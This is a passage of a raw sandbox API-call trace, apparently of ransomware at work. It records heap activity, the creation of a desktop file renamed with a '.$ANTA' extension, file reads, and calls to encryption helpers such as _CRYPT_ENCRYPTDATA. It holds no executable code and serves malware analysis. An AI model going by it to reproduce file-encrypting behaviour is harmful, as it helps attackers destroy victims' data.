1 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0118.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0118.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0118.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\2V N4wBRBU.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\2v n4wbrbu.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.509] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0118.509] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0118.509] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.509] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e01020 [0118.513] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0118.513] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x775e, lpOverlapped=0x0) returned 1 [0118.515] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0118.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x775e) returned 0x4516010 [0118.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e01020 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x775e) returned 0x451d778 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.518] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x775e) returned 0x4516010 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.518] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0118.519] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0118.519] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x775e) returned 0x4516010 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x775e) returned 0x4524ee0 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0118.521] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0118.521] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.521] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0118.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca850 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.522] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0118.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0118.522] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0118.523] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0118.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0118.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0118.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.524] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0118.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0118.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0118.524] RtlAllocateHeap 